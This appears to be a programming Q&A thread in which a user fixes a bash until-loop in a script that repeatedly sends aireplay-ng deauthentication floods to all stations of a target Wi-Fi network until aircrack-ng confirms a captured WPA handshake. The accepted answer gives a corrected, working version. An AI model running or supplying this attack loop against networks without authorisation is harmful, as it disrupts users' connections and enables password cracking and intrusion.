# bash until loop true when condition returns anything

Tags: bash, shell, while-loop, infinite-loop, aircrack-ng

Trying to figure out how to get this until loop to kill the script when it actually has **any data** returned. i've tried -z, -n etc with no luck. This script is designed to take any airodump-ng output for a specific BSSID (in csv format), and iterate through each station and deauthenticate them infinitely on a period of 5m **until $SUCCESS returns that a 4way handshake was captured**

Any help would be greatly appreciated!

```
#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME

BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)

until [ "$SUCCESS" -n ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
          aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
          sleep 5s;
  done
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done
```

Here is the debug output. You can see that it loops even though we recieved a handshake.

```
root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [  -n ]
sh: -n: unknown operand
+ awk+  -F,sed+  NR>5{print $1} -esed
 /Station MAC/d -e -e /^.$/d /BSSID/d

+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS=   1  00:11:11:11:11:11  attackeme                     WPA (1 handshake)
+ [    1  00:11:11:11:11:11  attackme                     WPA (1 handshake) -n ]
sh: -n: unknown operand
```

Answer (score 3, accepted):

The line:

```
SUCCESS=$(something)
```

will run `something` *once* and store the output into the `SUCCESS` environment variable.

Your `until` loop body never runs that command *explicitly* so I think you may believe that `$SUCCESS` in the `until` statement is somehow running the command.

That is not the case. It's simply re-evaluating the `SUCCESS` variable. You need to explicitly re-run the command, such as with:

```
SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d'); do
    aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
    sleep 5m;
  done
  SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done
```

Without that penultimate line, the `SUCCESS` variable is never actually changing, which would explain why your loop never exits.

---

You'll hopefully notice the *other* change that I made to your code, that of changing the line:

```
until [ "$SUCCESS" -n ]; do
```

into:

```
until [ -n "$SUCCESS" ]; do
```

The latter is the correct way to test if the `SUCCESS` environment variable holds a non-empty string.

Comment: This is helpful as it identified an issue with my logic, but i'm still not able to evaluate whether or not $SUCCESS returns any value, thus making it True. Updating the original post to reflect changes

Comment: @dobbs, see my final paragraph. Your update clearly still has the `-n` *after* the thing being evaluated, *not* before. It should be `until [ -n "$SUCCESS" ] ...`, not `until [ "$SUCCESS" -n ] ...`.

Comment: Missed that detail. Thank you!! :)

Comment: @dobbs, if you missed it, then others may too. I'll modify the answer to try make it more obvious.

Comment: I would have upvoted, except you retained the `cat`: http://www.smallo.ruhr.de/award.html

Comment: @cdarke, I retained the `cat` because it's totally irrelevant to the question or answer - actually I didn't so much 'retain it' (an action) as I did 'not bother to change it' (an inaction). I'm sure there's probably a dozen *other* ways I could have improved the code but saw no need to :-)

Comment: now this has just become pure mental masturbation. Thanks for the eyes on -n. thats all i was asking for.